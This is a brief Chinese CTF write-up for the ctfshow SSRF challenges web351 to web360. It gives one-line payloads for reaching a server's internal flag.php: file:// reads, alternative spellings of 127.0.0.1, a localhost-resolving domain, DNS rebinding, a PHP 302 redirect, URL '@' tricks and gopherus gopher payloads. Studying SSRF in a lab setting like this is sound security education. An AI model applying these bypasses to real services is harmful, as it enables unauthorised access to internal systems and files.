其他师傅都写得很详细了,只是做个简单的笔记。
1 web351
POST
url=file:///var/www/html/flag.php
2 web352
只限制了协议。
url=http://127.0.0.1/flag.php
3 web353
十六进制表示:
url=http://0x7F000007/flag.php
在线转换工具:https://tool.520101.com/wangluo/jinzhizhuanhuan/
4 web354
不知道为什么服务器没有成功。A记录是127.0.0.1的网站: http://sudo.cc/ ,可以不用解析自己的。本来想使用 DNS 重绑定平台,但是我常用的那个平台现在不能用了。emm
url=http://sudo.cc/flag.php
- (方便绑定IP)DNS重绑定平台:http://ceye.io/
5 web355
在 CTF从0到1 中有介绍这种利用方式
http://127.1/flag.php
6 web356
http://0/flag.php
7 web357
代码中检测了IP的范围,所以需要使用302或者DNS重绑定。
<?php
header("Location:http://127.0.0.1/flag.php");
8 web358
正则表达式的意思是以http://ctf.开头,以show结尾。
http://ctf.@127.0.0.1/flag.php?show
URL的结构如下:
9 web359
- 使用 gopherus 生成 Payload
- 把下划线后面的内容url编码一次
- post:reurl=xxx
10 web360
方法同 web359
参考教程:
- ctfshow-web入门 ssrf篇_volcano的博客-CSDN博客:https://blog.csdn.net/weixin_45696568/article/details/114434596
- CTFSHOW SSRF篇_羽的博客-CSDN博客:https://blog.csdn.net/miuzzx/article/details/111992415
|